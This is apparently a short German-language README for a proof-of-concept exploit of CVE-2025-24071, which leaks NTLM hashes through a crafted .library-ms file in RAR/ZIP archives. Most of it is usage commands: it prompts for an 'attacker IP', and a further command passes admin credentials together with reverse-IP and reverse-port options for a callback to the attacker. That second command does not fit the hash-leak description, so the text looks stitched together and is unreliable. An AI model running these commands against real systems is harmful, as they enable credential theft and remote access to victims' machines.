
Proof-of-concept für CVE-2025-24071, das NTLM-Hash-Leck über eine manipulierte .library-ms-Datei in RAR/ZIP-Archiven demonstriert, das SMB-Authentifizierung beim Extrahieren auslöst.
CVE-2025-24071: NTLM-Hash-Leck durch RAR/ZIP-Extraktion und .library-ms-Datei
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888